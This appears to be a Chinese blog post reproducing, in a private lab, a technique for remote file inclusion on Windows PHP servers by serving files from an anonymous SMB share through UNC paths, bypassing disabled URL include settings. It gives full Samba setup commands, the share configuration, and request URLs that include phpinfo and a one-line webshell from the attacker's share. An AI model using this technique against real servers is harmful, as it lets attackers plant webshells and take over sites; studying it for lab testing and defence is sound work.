首页 » NetworkSec » Penetration » 正文

利用smb绕过双off进行RFI

0x00 概述

前段时间看到这篇文章,感觉有点意思,特此重现。

0x01 重现

先off

尝试远程包含phpinfo

http://192.168.43.237:8888/lsawebtest/misc/smbrfi/getfile.php?filename=http://192.168.138.129/x.php

搭建smb服务器

apt-get install samba

mkdir /var/www/html/pub/

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

echo > /etc/samba/smb.conf

写入

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[ethan]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

配置匿名可访问smb

service smbd restart

成功包含Phpinfo和一句话木马

http://192.168.43.237:8888/lsawebtest/misc/smbrfi/getfile.php?filename=\\192.168.138.129\ethan\x.php

http://192.168.43.237:8888/lsawebtest/misc/smbrfi/getfile.php?filename=\\192.168.138.129\ethan\xxxxx.php

0x02 结语

本人未测试外网smb和非windows服务器,根据网上别人的测试,这种方法只对windows php服务器(默认有smb客户端,UNC特性\\)有效,linux服务器可能需要安装smb客户端或者不支持UNC(默认不支持smb);外网smb无效,可能是运营商禁了445,还是有点鸡肋……

Comment